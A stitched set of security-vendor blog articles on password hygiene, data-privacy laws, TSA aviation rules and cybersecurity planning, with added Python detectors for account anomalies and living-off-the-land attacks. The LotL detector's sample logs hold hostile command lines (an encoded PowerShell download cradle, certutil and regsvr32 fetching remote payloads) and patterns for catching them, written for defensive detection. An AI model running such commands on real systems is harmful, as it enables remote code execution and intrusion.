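            reasons.append(f"first login from host {host}")
            score += 3.0
        return score, reasons


def learn(events) -> dict[str, Baseline]:
    """Build (or extend) per-user baselines from historical events."""
    baselines: dict[str, Baseline] = {}
    for user, hour, host, nbytes in events:
        baselines.setdefault(user, Baseline()).update(hour, host, nbytes)
    return baselines


def evaluate(baselines: dict[str, Baseline], user: str, hour: int, host: str, nbytes: int) -> tuple[bool, list[str]]:
    """Score one live event; returns (alert?, reasons).  Unknown users always alert."""
    base = baselines.get(user)
    if base is None:
        return True, [f"no baseline for user {user}"]
    score, reasons = base.score(hour, host, nbytes)
    if score < ALERT_THRESHOLD:
        base.update(hour, host, nbytes)  # benign events keep the baseline current
    return score >= ALERT_THRESHOLD, reasons


if __name__ == "__main__":
    b = learn(TRAINING_EVENTS)
    for ev in [("alice", 3, "ws-alice", 2_500), ("alice", 10, "vpn-gw", 3_000),
               ("svc-backup", 2, "bkp01", 50_000_000), ("mallory", 4, "ws-x", 10)]:
        print(ev, "->", evaluate(b, *ev))
```

Two design points carry over to real deployments: only events that score below the threshold are folded back into the baseline, so an attacker cannot "train" the model by repeating the anomalous behavior, and the backup account's large nightly transfers are normal for it, so the same 50 MB that would be routine for a backup job is scored relative to each identity rather than against a global rule.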

 

About Segura®
Segura® strives to ensure the sovereignty of companies over their privileged actions and information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

New cybersecurity requirements from the U.S. Transportation Security Administration (TSA)

On March 7, 2023, the Transportation Security Administration (TSA) issued a new emergency amendment requiring regulated airlines and airports to strengthen their ability to withstand cyber attacks. The measure came less than a week after the United States government announced its National Cybersecurity Strategy, and it follows similar requirements directed at freight and passenger rail carriers.

According to the statement, TSA's priority is to protect the United States transportation system, working collaboratively with stakeholders and offering safe, secure, and efficient travel. The amendment was deemed necessary because attackers have repeatedly targeted the aviation industry using a variety of intrusion methods.

In July 2022, American Airlines was a victim of a phishing attack, granting unauthorized access to its IT environment. In addition, various airports in the United States were targeted by DDoS attacks in October of the same year.

For this reason, regulated entities affected by the TSA must promote the following actions:

  • Develop network segmentation policies and controls, ensuring that operational technology systems can continue to operate safely if the IT environment is compromised;
  • Create access control measures, protecting critical systems from unauthorized access;
  • Implement continuous monitoring and detection policies and procedures to identify and respond to cyber security threats and anomalies; and
  • Reduce the risk of exploitation of unpatched systems by applying security patches and updates to operating systems, applications, drivers, and firmware, following a risk-based methodology.

Previously imposed requirements for aircraft operators and airports include establishing a cyber security point of contact, developing and adopting a cyber security incident response plan, conducting a cyber security vulnerability assessment, and reporting significant cyber security incidents to the Cybersecurity and Infrastructure Security Agency (CISA).

Conclusion

In conclusion, the new amendment issued by the TSA is their latest effort to ensure that transportation operators improve their ability to address cyber threats. In this article, we covered its goals and importance.

According to Cybersecurity Ventures, the world ended 2020 with 300 billion passwords to protect. And the trend shows this number will increase dramatically. Email accounts (personal and professional), banking services, corporate systems, devices, and applications are some examples that require authentication through passwords. And with the increase in the number of data leaks, it is easy to find compromised credentials on forums on the dark web being sold for pennies.

And yes, we know that it is not easy to manage so many passwords. Even the most tech-savvy can struggle to manage and protect credentials in so many different environments. In times of personal data protection legislation, such as LGPD and GDPR, ensuring the protection of such data has become more than a security requirement – it is a business must.

Despite all the risks associated with their use, many users and companies use passwords that are easy to guess, such as numbers or sequential letters (123456 or abcdef). SolarWinds itself, the victim of a serious attack on its supply chain, was using the password solarwinds123 in its infrastructure. Certainly, your email password or mine is stronger than the one used by this American technology company.

So, on this World Password Day, here are some tips that should be considered by users to keep their data protected:

  1. Use long and complex passwords; length matters more than the number of symbols. This makes guessing and brute-force attacks impractical. Complexity alone is not enough, though: a complex password that is reused or has already leaked offers no protection.
  2. Many devices ship with default passwords. Change them immediately.
  3. Avoid reusing passwords across accounts, and regularly check whether your credentials have appeared in a data leak (for example, through senhasegura Hunter). If they have, change them immediately.
  4. Change a password immediately whenever it may have been exposed. If your organization requires periodic rotation, every 3 months is a common interval; note that current NIST guidance (SP 800-63B) favors screening passwords against breached-password lists over forced periodic changes.
  5. Do not write passwords down, store them in an easily accessible place, or share them with others, so as to avoid unauthorized access.
  6. Consider a password management solution, or even privileged access management (PAM), to manage access to systems and devices.
  7. Use Multi-Factor Authentication (MFA) to add a layer of security to your accounts.
  8. Set up account recovery options, such as a recovery phone number or email address, and protect those as carefully as the account itself.
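The tips above name concrete anti-patterns: sequential strings like 123456 or abcdef, a vendor name with digits appended (solarwinds123), unchanged defaults, and credentials that have already leaked. As an added example, not code from the original article or any senhasegura product, the block below checks a password offline against each of those patterns. The breach corpus and the default-credential list are constructed stand-ins; the 12-character and 60-bit thresholds are assumptions. The breach check is structured the way a real k-anonymity range lookup works: only the first five hex characters of the SHA-1 hash would leave the machine, and the comparison of suffixes happens locally.

```python
"""Added example (not from the original article): offline checks for the
password anti-patterns the tips above warn about.  The breach corpus here is
a constructed stand-in; a real check would send only the 5-character SHA-1
prefix from k_anonymity_prefix() to a range API and compare the returned
suffixes locally, exactly as check_password() does against the local set."""
import hashlib
import math
import re
import string

# Constructed stand-in for a breach corpus: SHA-1 hashes of a few leaked passwords.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("123456", "password", "solarwinds123", "qwerty", "abcdef")
}
# Constructed list of factory/default credentials (tip 2).
DEFAULT_CREDENTIALS = {"admin", "password", "changeme", "default", "12345678"}

MIN_LENGTH = 12        # assumption: policy minimum
MIN_ENTROPY_BITS = 60  # assumption: rough brute-force resistance floor


def _has_sequence(pw: str, run: int = 4) -> bool:
    """True if pw contains `run` consecutive ascending or descending characters (1234, dcba)."""
    s = pw.lower()
    for i in range(len(s) - run + 1):
        steps = {ord(s[j + 1]) - ord(s[j]) for j in range(i, i + run - 1)}
        if steps in ({1}, {-1}):
            return True
    return False


def _has_repeat(pw: str, run: int = 4) -> bool:
    """True if one character is repeated `run` or more times in a row (aaaa)."""
    return re.search(r"(.)\1{%d,}" % (run - 1), pw) is not None


def _charset_bits(pw: str) -> float:
    """Upper bound on entropy, assuming uniform random choice from the character classes used."""
    size = 0
    if any(c.islower() for c in pw):
        size += 26
    if any(c.isupper() for c in pw):
        size += 26
    if any(c.isdigit() for c in pw):
        size += 10
    if any(c in string.punctuation for c in pw):
        size += len(string.punctuation)
    return len(pw) * math.log2(size) if size else 0.0


def k_anonymity_prefix(pw: str) -> tuple[str, str]:
    """Split SHA-1(pw) into the 5-hex-char prefix a range API receives and the suffix kept local."""
    digest = hashlib.sha1(pw.encode()).hexdigest().upper()
    return digest[:5], digest[5:]


def check_password(pw: str, context_words: tuple[str, ...] = ()) -> list[str]:
    """Return findings for pw; an empty list means every check passed.
    context_words: names an attacker would try first (company, product, username)."""
    findings = []
    if len(pw) < MIN_LENGTH:
        findings.append(f"too short ({len(pw)} chars; use {MIN_LENGTH} or more)")
    if _charset_bits(pw) < MIN_ENTROPY_BITS:
        findings.append("low estimated entropy; lengthen it or add character classes")
    if _has_sequence(pw):
        findings.append("contains a sequential run such as 1234 or abcd")
    if _has_repeat(pw):
        findings.append("contains a repeated character run")
    low = pw.lower()
    for w in context_words:
        if w.lower() in low:
            findings.append(f"contains context word '{w}'")
    if low in DEFAULT_CREDENTIALS:
        findings.append("is a well-known default credential")
    prefix, suffix = k_anonymity_prefix(pw)
    # Range lookup: only hashes sharing the 5-char prefix are compared, and only locally.
    if suffix in {h[5:] for h in BREACHED_SHA1 if h.startswith(prefix)}:
        findings.append("appears in the breach corpus; change it immediately")
    return findings


if __name__ == "__main__":
    for pw in ("123456", "solarwinds123", "Tr0ub4dor&3-correct-horse-staple"):
        print(pw, "->", check_password(pw, context_words=("solarwinds",)) or "OK")
```

The entropy figure is an upper bound: "solarwinds123" scores about 67 bits by character-class math but is worthless because it is built from a guessable word, which is why the context-word and breach checks run regardless of the entropy result.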

Passwords are one of the oldest security mechanisms in the computing world and are also one of the main attack vectors used by hackers. And in the "new normal" era, with increasing threats resulting from the covid-19 pandemic, it is vital that users stay alert and properly protect their digital identities. In this way, we can avoid cyberattacks that can cause considerable damage not only to people, but also to companies. And on this World Password Day, remember: security starts with you!


International Data Privacy Day: why does this date matter?

On January 28, we celebrate the International Day for the Protection of Personal Data, or Data Privacy Day. This date leads us to reflect on the importance of laws that safeguard the correct processing of private information in the most diverse countries. Data Privacy Day began as an educational initiative of the Council of Europe, which first celebrated the date in 2007; two years later, in 2009, the United States followed. The purpose of Data Privacy Day is to make people aware of best practices for protecting their personal data online, especially on social media. Today the day is observed in the 47 member states of the Council of Europe, in the United States, and in countries such as Canada, Israel, and Brazil.

We prepared this article to address topics related to Data Privacy Day. To facilitate your understanding, we divided our text into the following topics:
  • Data Protection Day: Background
  • How Data Protection Laws Work
  • About GDPR
  • LGPD: Brazilian Data Protection Law
  • How to Protect Personal Data
  • About senhasegura
  • Conclusion
Enjoy the read!

Data Protection Day: Background

In April 2006, the Council of Europe chose January 28 to celebrate Data Protection Day. The date refers to Convention 108, opened for signature on January 28, 1981, which addresses the automated processing of personal data and was the first binding international instrument on data protection. It was signed by the Council's member states to guarantee the fundamental right to privacy, including good data processing practices. Today the day is celebrated to raise awareness of that right, bearing in mind that organizations collect and process more information every day, and that this processing needs to be monitored so that the rights of data subjects are not put at risk.

How Data Protection Laws Work

Data protection laws establish personal information protection policies, determining how corporations should treat the data of their customers, employees, and business partners. In practice, it is necessary for individuals, companies, and governmental organizations to apply certain rules related to how they handle this information, such as collection, processing, and storage, to ensure compliance with current legislation. Moreover, companies wishing to conduct business with another country must respect the data protection laws present in both nations.

About GDPR

European rules on the use of personal information are contained in the General Data Protection Regulation (GDPR), which requires the responsible use of personal data. It applies directly in all EU and EEA member states; other European countries, such as the United Kingdom and Switzerland, have their own data protection laws that are closely aligned with it. Organizations outside Europe that offer goods or services to, or monitor the behavior of, people in the EU must also comply. The Regulation addresses criteria such as the consent of data subjects, notification of data breaches to the supervisory authority (within 72 hours of becoming aware of them), and data subjects' rights, including:
  • Being informed about the collection and use of their personal information;
  • Requesting a copy of their data and details on how it is collected, what is collected, and who has access to it;
  • Requiring rectification of incomplete or incorrect data;
  • Requesting erasure of their data (the "right to be forgotten"), which the controller must act on without undue delay, normally within one month;
  • Restricting the processing of their personal data;
  • Receiving their data in a portable format and having it transferred to another controller (data portability);
  • Objecting to how their data is processed, subject to exceptions such as processing required by law.

LGPD: Brazilian Data Protection Law

The General Data Protection Law (LGPD) is Brazilian legislation that protects the personal data of individuals located in Brazil. It defines what personal data is and which categories (sensitive data) require the strongest protection. Under the LGPD, even companies based outside the country must comply when they process the data of people in Brazil.

How to Protect Personal Data

It is possible to have control over your data through good practices that reinforce its security. Here are some of them:
  • Keep your devices’ software up-to-date to prevent threats that could damage your devices and compromise your personal data;
  • Verify that a web page is trustworthy before entering your data: the address should start with https:// (plain http:// sends your data unencrypted) and the browser should show the lock icon indicating a valid certificate. Note that HTTPS only proves the connection is encrypted to the site named in the address bar, not that the site is legitimate, so check the domain name as well;
  • Avoid exposing personal information on social media such as Facebook, LinkedIn, Instagram, and TikTok, and set up your privacy in posts;
  • Do a general scan to know what data is being shared and, if necessary, disable options;
  • Do not enter sensitive data on public Wi-Fi networks;
  • Use strong passwords. For this, you can combine uppercase, lowercase, numbers, and special characters. It is also important to avoid obvious things like names, phone numbers, and dates of birth.

About senhasegura

We, from senhasegura, are part of MT4 Tecnologia, a group of companies focusing on information security, founded in 2001 and operating in more than 50 countries. Our commitment is to provide digital sovereignty and security to our clients, grant control over privileged actions and information, and prevent data breaches and leaks. For this, we follow the lifecycle of privileged access management through machine automation, before, during, and after accesses. In short, our initiatives aim to:
  • Avoid interruption of companies’ activities, which may impair their performance and profitability;
  • Provide advanced PAM solutions;
  • Automatically audit privileged changes in order to identify privilege abuses;
  • Automatically audit the use of privileges;
  • Reduce cyber threats; and
  • Bring organizations into compliance with audit criteria and standards such as HIPAA, PCI DSS, ISO 27001, and Sarbanes-Oxley.
Conclusion

In this article, we have shown the importance of Data Protection Day and laws related to the preservation of personal information, in addition to some measures that can be adopted to protect sensitive data. Was our content relevant to you? Then share it with someone also interested in the topic.


How do you choose the best cybersecurity project for your company?

The IBM Cost of a Data Breach 2022 report brought a lot of information that shows the importance of choosing a good cybersecurity project for your organization.

The report is based on more than 3,600 interviews with people working at 550 organizations that suffered a data breach between March 2021 and March 2022, and its conclusions are alarming.

First, 83% of the organizations surveyed had experienced more than one breach. Also, 60% of breached organizations raised prices for their customers as a result.

It was also found that 79% of critical infrastructure organizations had not deployed a zero-trust architecture, and that 19% of breaches were caused by a compromised business partner.

Faced with so many digital security gaps, it can be difficult to know where to start deploying a cybersecurity project. Therefore, we address this issue here. To facilitate your reading, we divided our text into topics. These are:

  • About Cybersecurity
  • Importance of Cybersecurity
  • Cybersecurity Project: What Is It, and What Is Its Importance?
  • What Are the Five Types of Cybersecurity?
  • People, Processes, and Technologies: Crucial Elements for the Success of Every Cybersecurity Project
  • Guidelines for Prioritizing Cybersecurity Projects within a Company
  • Key Cyber Threats Faced by Companies
  • About senhasegura
  • Conclusion

Enjoy the read!

About Cybersecurity

When we talk about cybersecurity, we refer to a set of technologies, procedures, and methods used to prevent attacks on devices, programs, data, and networks, avoiding the activity of hackers and ensuring the privacy of a company’s data, which must be protected from insider and external threats and natural disasters.

However, accelerated by the Covid-19 pandemic, digital transformation has brought several vulnerabilities, such as those related to remote work. As a result, there was a significant increase in data leaks, phishing emails, and account invasions.

Importance of Cybersecurity

Currently, processes in companies are migrating to the online world as part of digital transformation, which also makes it easier to lose information of great importance to a business.

Thus, organizations need to invest in cybersecurity to keep their operations running and to prevent threats such as malware, viruses, and phishing.

One should also be aware that attackers keep improving their techniques over time, so maintaining data security and avoiding business compromise is increasingly challenging.

Another recent development is data protection laws, which hold organizations accountable for the exposure of sensitive information about their customers, employees, and business partners, with sanctions running into millions of dollars.

In practice, these legislations have several requirements to be respected in order to avoid accidental or intentional data loss.

That is, investing in a good cybersecurity project is the recommended measure to avoid inconvenience, financial losses, loss of credibility, and closure of companies.

Cybersecurity Project: What Is It, and What Is Its Importance?

Cybersecurity projects are aimed at promoting digital security within any company. Their importance lies in preventing cyber threats, such as intrusions by hackers. They also reduce the impact of errors, whether deliberate or not, by employees or third parties, and lower the chance of losses such as loss of data, loss of credibility, and multi-million-dollar sanctions under data protection laws, which can even put an end to a business. In small companies this is even more crucial: according to a Cisco study, 60% of organizations affected by a cyberattack shut down operations within 6 months of the incident.

What Are the Five Types of Cybersecurity?

There are five types of cybersecurity. These are:

  • Critical Infrastructure Security;
  • Application Security;
  • Network Security;
  • Cloud Security; and
  • Internet of Things (IoT) Security.

Check out each of them in detail below:

Critical Infrastructure Security

What Is It?
When talking about critical infrastructure security, we refer to the area that contemplates the security of systems, networks, and assets in industries that are essential to ensure the security of a country’s economy, health, and public services. These sectors include the chemical, communications, utilities, energy, and financial industries.

What Are the Challenges?
A major challenge for critical infrastructure is that much of it runs on legacy operational technology that was not designed with security in mind, so its systems carry known weaknesses while offering few built-in protection features.

Application Security

What Is It?
Application security is essential as these programs have increasingly become targets for hackers. It consists of practices adopted to make them more secure, which occurs during their development and then after their implementation.

What Are the Challenges?
Ensuring application security requires tracking all the tools developed for these applications. It is also important to be aware of the future needs of a company, which may require software aimed at a more complex infrastructure.

Network Security

What Is It?
Network security is a term that refers to hardware and software solutions, as well as procedures aimed at protecting the network and data against cyberattacks. In practice, this concept includes network analysis, application security, access control, and antivirus software, among other factors.

What Are the Challenges?
The main challenge of network security is to maintain protection in increasingly complex structures, with a large volume of cyber threats and several functionalities used in corporations, which also represent new problems.

Cloud Security

What Is It?
As companies suffer the impact of digital transformation, they become more dependent on cloud solutions and need to adopt measures that ensure digital security in this context.

This is because, under the shared responsibility model, the provider may manage the underlying infrastructure, but accountability for the data the organization places in the cloud, and for how access to it is configured, remains with the organization.

What Are the Challenges?
The challenges of companies adopting cloud solutions are related to the ability to meet security criteria in a dynamic environment, which can generate a lack of visibility in accessing and using data.

Internet of Things (IoT) Security

What Is It?
Internet of Things security is concerned with protecting devices connected directly to the cloud, such as surveillance cameras. Its role is to protect devices that were often designed without cybersecurity and data protection in mind.

What Are the Challenges?
The greatest challenge associated with the internet of things security refers to human activity. In practice, with the increased connectivity of these devices, it is necessary to instruct users on the change of default passwords and the need for updates, for example.

On the other hand, many users do not see these devices as targets of attacks and end up ignoring best security practices during their development and use.

People, Processes, and Technologies: Crucial Elements for the Success of Every Cybersecurity Project

An efficient cybersecurity project does not only involve the five types of digital security covered in the previous topic. It is also important to take other essential elements into account. They are: people, processes, and technology.

Here’s what you need to know about these aspects:

People

When it comes to cybersecurity projects, investing in cutting-edge technology is not enough. It is essential to train users to follow security protocols and ensure the protection of company data.

In practice, your employees increase security risks in a variety of ways.
Among them, we can highlight:

Clicking on URLs and Opening Suspicious Emails

It is necessary to make your employees aware of the risks involved in this practice and to encourage them to delete, or better, report, emails from suspicious or spoofed addresses, in order to protect sensitive data.

Keeping the Same Password for a Long Period

To ensure the security of your company, employees must change a password as soon as it may have been exposed, use strong combinations, and never reuse the same password across services. Periodic forced rotation is still a common policy, but current NIST guidance (SP 800-63B) favors screening passwords against breach lists over scheduled changes.

Because it is difficult to memorize so many passwords, we also recommend a password vault, which requires the user to remember only a single master password.

Personal Browsing

Many people use the devices of their companies for personal purposes, such as accessing social media, shopping, or paying bills. The big problem is that this behavior facilitates the work of malicious agents who want to collect information. Therefore, ask your employees to use their own devices, not corporate ones, for personal browsing.

Lack of Backups

Many people still fail to back up their work when finishing their tasks. Nevertheless, backing up system and user files is of paramount importance, and employees should understand that the IT team can help them set this up.

Unattended Devices

Leaving devices on desks unattended and without blocking them is a fairly common practice, which can also cause damage to the security of a company. For this reason, it is essential to make employees aware of the importance of preserving data contained in these devices and maintaining their control.

Processes

Information security professionals use numerous processes to protect sensitive data. In practice, they need to identify and combat cyber threats, protecting information and responding to incidents.
Besides being implemented, these processes must be documented to save time and financial resources, and preserve customer confidence in cases of cyberattacks.

To counter cybersecurity-related risks, we recommend using the Cybersecurity Framework developed by the National Institute of Standards and Technology (NIST) of the U.S. Department of Commerce. It originated with Executive Order 13636, signed by then-President Barack Obama in 2013; version 1.0 of the framework was published in 2014, and version 2.0 in 2024.

Technology

After the deployment of security processes, it is indispensable to assess the tools available to avoid cyber threats.

For this, you must consider two types of technology: those that will help you prevent and combat attacks, such as antivirus, DNS filtering, and malware protection; and those that need protection, including computers, routers, and the cloud.

Previously, we could rely on security perimeters. Now, migration to cloud environments, remote work, and policies like Bring Your Own Device (BYOD) have made it easier for hackers to work.

Guidelines for Prioritizing Cybersecurity Projects within a Company

Prioritizing cybersecurity projects is essential to avoid overwhelming IT staff with low-value work and to ensure the company's ability to deal with a cyberattack.

However, to create and run your cybersecurity project, you must take some action. They are as follows:

Understanding Your Company’s Goals

Each organization has its strategic goals, which should guide the creation of the cybersecurity project. Therefore, it is important to evaluate the company’s vision and its business and cybersecurity strategies.

This information will provide a basis for the development of the project and will be a guide to gradually know if it is, in fact, efficient.

To understand the strategic goals of the company, read documents related to the subject and talk to top management to know their priorities.

Discovering the Reason Behind the Project

Cybersecurity projects can be motivated by several reasons, although all of them share the common goal of preventing and responding to cyber incidents.

In practice, the project can be an awareness and training campaign on cybersecurity, the implementation or updating of a security system, compliance with new laws and regulations, etc.

Understanding what the project’s motivation is will certainly contribute to establishing priorities, directly impacting the company’s operations.

Determining the Value of the Project

Here, when we talk about value, we are referring to the importance of a cybersecurity project for an organization. That is, it is convenient to analyze how it will impact stakeholders and what its real importance is to the business. A project that adds great value must necessarily be prioritized.

Analyzing the Urgency

It is important to assess the urgency of the cybersecurity project to determine whether it should be prioritized or can wait. But remember that priorities can and should be modified as changes occur.

Detailing the Aspects that Affect the Project’s Success

A successful cybersecurity project depends on a number of factors, including budgets, deadlines, and return on investment (ROI), among other things.

On the other hand, it is often impossible to execute a project due to unfavorable circumstances. Therefore, it is advisable to know what can affect the project’s success in advance.

Ranking the Cybersecurity Project According to the Priority

With the information on goals, objectives, and possibilities of success in hand, it is time to establish an order of priorities through an overall classification, which can be score-based.

Defining How Many Projects Can Be Executed at a Time

Probably, the organization will not be able to assume all priority projects at once. Thus, the solution is to work on them in a phased manner, creating a queue of plans to execute.

Another recommendation is to run the fastest ones first and then the ones that require more time and effort.

Sharing Findings with Top Management

Before starting the cybersecurity project, it is essential to meet with leaders and share the information gathered. This is because the findings can serve as insights to change the order of priorities of the projects, requiring top management to be on board.

Working Flexibly

Working with cybersecurity projects requires flexibility, after all, priorities can be modified according to context. By the way, this occurred in most companies after the beginning of Covid-19, which accelerated the mass adoption of remote work and brought new demands to security teams.

Key Cyber Threats Faced by Companies

The following are the main cyber threats that should be considered by a cybersecurity project:

  • Ransomware;
  • Phishing;
  • Attacks on Mobile Devices;
  • Attacks Using QR Codes;
  • Denial-of-Service (DDoS) Attacks; and
  • LotL and AVT Attacks.

See the detailed explanation of each of them below:

Ransomware

This type of cybercrime works like this: the attacker encrypts (or otherwise locks) systems or data and demands a large ransom for the decryption key. Increasingly, attackers also steal the data before encrypting it and threaten to publish or sell it to other criminals if the ransom is not paid (double extortion), so paying offers no guarantee that the information is returned. Because many companies lack efficient cybersecurity mechanisms, this tactic is very common.

Phishing

Another common crime in the virtual environment is phishing, which consists of sending counterfeit emails, and pretending to be a legitimate organization. With this, malicious agents convince their victims to share personal information or take action to their benefit.

There are also some types of very sophisticated phishing attacks, such as very realistic audio recordings produced through artificial intelligence.

Attacks on Mobile Devices

With many people working remotely, the use of personal devices for corporate purposes and the use of corporate devices for personal purposes tend to occur more frequently.
This increases security vulnerabilities, especially in the face of malware
attacks on devices.

Attacks Using QR Codes

Currently, cybercriminals use QR Codes to deploy malware applications, infecting their victims’ phones and stealing their bank details.
For this reason, it is advisable to check the code provided by the company before accessing it.

Denial-of-Service (DDoS) Attacks

This type of attack occurs when the attacker overloads a machine or service with traffic, disrupting its normal operation and making the service unavailable to users. A plain denial-of-service (DoS) attack comes from a single source; a distributed denial-of-service (DDoS) attack is launched from many compromised machines at once (a botnet), which makes it far harder to filter by blocking individual addresses.

LotL and AVT Attacks

Less known, Living off the Land (LotL) attacks do not need to drop malicious files to operate inside a company's systems because they abuse legitimate tools and features that are already present, such as PowerShell, WMI, certutil, and rundll32, which makes them hard to distinguish from normal administration.
Advanced Volatile Threat (AVT) attacks run entirely in memory, leaving little or no trace on disk, so they evade file-based scanners and disappear on reboot. Both techniques call for monitoring process behavior and command lines rather than relying on file scanning alone.
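Because LotL activity uses binaries that are legitimately present, the detection signal is in how those binaries are invoked and by what parent process, not in any file. As an added example, not code from the original article or any senhasegura product, the block below runs a handful of such rules over constructed process-creation log lines in the style of Sysmon event ID 1 / Windows event 4688. The abused binaries and switches (certutil -urlcache, regsvr32 /i:http with scrobj.dll, rundll32 javascript:, wmic process call create, PowerShell -EncodedCommand) are real LOLBin patterns and the technique IDs are MITRE ATT&CK's; the hosts, users, URLs and the log format itself are made up for the demo. The encoded PowerShell is decoded so an analyst sees what the command line actually does.

```python
"""Added example (not from the original article): a small detector for
living-off-the-land activity over constructed process-creation log lines
(Sysmon event 1 / Windows 4688 style).  The LOLBin patterns are real; the
hosts, users, URLs and log lines are made up."""
from __future__ import annotations

import base64
import re


def _encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


HIDDEN_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"

# Constructed sample events: host|user|parent_image|image|command_line
SAMPLE_LOGS = [
    "ws01|alice|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
    "ws01|alice|WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    f"powershell.exe -nop -w hidden -enc {_encode_powershell(HIDDEN_SCRIPT)}",
    "ws02|bob|cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f http://example.test/p.exe p.exe",
    "ws02|bob|cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -hashfile setup.msi SHA256",
    "srv01|svc-web|w3wp.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"",
    "ws03|carol|explorer.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s /n /u /i:http://example.test/x.sct scrobj.dll",
    "ws03|carol|cmd.exe|C:\\Windows\\System32\\wmic.exe|wmic.exe /node:srv02 process call create \"cmd /c whoami\"",
]

# Command-line indicators: (ATT&CK technique, compiled pattern).
RULES = [
    ("T1059.001 PowerShell with encoded command",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("T1105 certutil used as a downloader",
     re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("T1218.011 rundll32 executing script",
     re.compile(r"rundll32(?:\.exe)?\b.*(?:javascript|vbscript):", re.I)),
    ("T1218.010 regsvr32 loading remote scriptlet",
     re.compile(r"regsvr32(?:\.exe)?\b.*/i:https?://.*scrobj\.dll", re.I)),
    ("T1047 WMI remote process creation",
     re.compile(r"wmic(?:\.exe)?\b.*process\s+call\s+create", re.I)),
]
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the script hidden behind -enc/-EncodedCommand, or None if absent or malformed."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(lines: list[str]) -> list[dict]:
    """Return one alert per suspicious event, listing every rule that fired."""
    alerts = []
    for line in lines:
        host, user, parent, image, cmd = line.split("|", 4)
        image_name = image.rsplit("\\", 1)[-1].lower()
        hits = [name for name, rx in RULES if rx.search(cmd)]
        # Parent/child relationship: an Office document spawning a shell is a classic phishing follow-on.
        if parent.upper() in OFFICE_PARENTS and image_name in SHELLS:
            hits.append("Office application spawned a shell")
        if hits:
            alerts.append({"host": host, "user": user, "image": image_name,
                           "rules": hits, "decoded": decode_encoded_command(cmd)})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOGS):
        print(a["host"], a["user"], a["image"], a["rules"], a["decoded"] or "")
```

The benign certutil -hashfile line produces no alert while the -urlcache line does, which is the point: the rules key on the abusive switch combinations and parent processes, not on the mere presence of a built-in tool, so the same detector can run against a normal administrator's activity without drowning the analyst in noise.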

About senhasegura

We, from senhasegura, are part of MT4 Tecnologia, a group of companies specializing in digital security, founded in 2001 and operating in more than 50 countries.

Our main objective is to ensure digital sovereignty and security for our clients, granting control over privileged actions and data and avoiding theft and leaks of information.

For this, we follow the lifecycle of privileged access management through machine automation, before, during, and after accesses.

These are also our commitments:

  • Avoid interruptions in the activities of companies, which may impair their performance;
  • Automatically audit the use of privileges;
  • Automatically audit privileged changes to identify privilege abuses;
  • Provide advanced PAM solutions;
  • Reduce cyber risks;
  • Bring organizations into compliance with audit criteria and standards such as HIPAA, PCI DSS, ISO 27001, and Sarbanes-Oxley.

Conclusion

In this article, you saw that:

  • Cybersecurity is a set of technologies, procedures, and methods used to prevent cyberattacks;
  • Digital transformation has brought new vulnerabilities to IT structures;
  • Companies should invest in cybersecurity to prevent threats, such as malware, viruses, and phishing;
  • Data protection laws hold organizations accountable for the exposure of sensitive information of their customers, employees, and business partners;
  • Cybersecurity projects are aimed at promoting digital security within any company;
  • There are five types of cybersecurity: critical infrastructure security, application security, network security, cloud security, and Internet of Things (IoT) security;
  • People, processes, and technology stand out among the crucial elements for the success of a cybersecurity project;
  • To define the priorities of cybersecurity projects within a company, one needs to understand the organization’s objectives, find out the reason for each project, determine its value, assess its urgency, detail aspects that interfere with its success, rank projects in order of priority, define how many projects it is possible to execute at a time, share the findings with top management, and work flexibly;
  • The main threats faced by companies are ransomware, phishing, mobile device attacks, attacks using QR Codes, denial-of-service (DDoS) attacks, and LotL and AVT attacks.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.


About Segura®
Segura® strive to ensure the sovereignty of companies over actions and privileged information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

Machine Identity Management Best Practices

Remote work and the adoption of cloud computing have made identity the new perimeter.
